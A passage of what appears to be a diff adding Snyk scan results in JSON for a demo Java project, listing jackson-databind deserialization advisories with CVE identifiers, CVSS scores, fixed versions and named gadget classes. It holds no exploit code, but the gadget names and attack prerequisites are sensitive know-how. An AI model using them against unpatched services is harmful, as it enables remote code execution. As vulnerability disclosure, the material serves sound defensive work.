deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + 